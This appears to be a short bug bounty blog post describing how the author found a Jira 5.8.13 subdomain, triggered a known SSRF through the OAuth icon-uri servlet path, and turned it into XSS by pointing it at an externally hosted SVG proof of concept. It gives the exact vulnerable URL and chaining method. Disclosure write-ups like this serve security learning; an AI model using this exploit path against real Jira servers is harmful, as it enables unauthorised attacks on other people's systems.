How i converted SSRF TO XSS in jira.

Ashish Kunwar
2 min readJun 1, 2018

--

I m very much into Bug Bounty and i spend my whole day doing this finding new and interesting stuff and kept on upgrading my recon techniques.

So this Site was random and has vast subdomains to test

domain *.example.com

so i used some sites to find subdomains

  1. FindSubdomains.com

2. DnsDumpster

3. virustotal

4. Acunetix mannual tool

Before i start Acunetix does Subdomain scans so just set the time out to 20 and you will get a really big list with banners and response headers. (it does the half of the work for you.)

Now, i been through lots of subdomains and i was specifically looking for any jira environment , and i found one.

lets say wiki.example.com

so i looked at the version and it was “5.8.13” ,which is affected to ssrf ……

I remember the “Alyssa Herrera” writeup on “Piercing the Veil: Server Side Request Forgery to NIPRNet access

so i quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And Boom i got the google page and i m like

Hell Yea !

So i followed the writeup but couldn’t managed to get any sensitive info .

[Yes i tried everything ..nothing worked.]

And that’s where i was like “why god?” why ?

why God?

and then suddenly it came to my mind and i went to brute xss blog

copied “http://brutelogic.com.br/poc.svg” , and put it place of https://google.com

and boom , i got XSS

ssrf to XSS in #Vain

So it worked and i got bounty of 50$ which is less (and that company sucks)

Anyways it doesn’t matter at all , it was all about exploration and learning new things and gain experience.

#sharing is #caring

Hope you guys enjoyed it and learned something new. #[For who doesn’t know ,rest are leets].

Thank you

./Logout

follow me on twitter: Ashish Kunwar

and if you have any questions DM is open only for followers.

--

--

Ashish Kunwar
Ashish Kunwar

Written by Ashish Kunwar

i m a security researcher and exploit developer/ and love Fuzzing and break things |bug hunter|

Responses (3)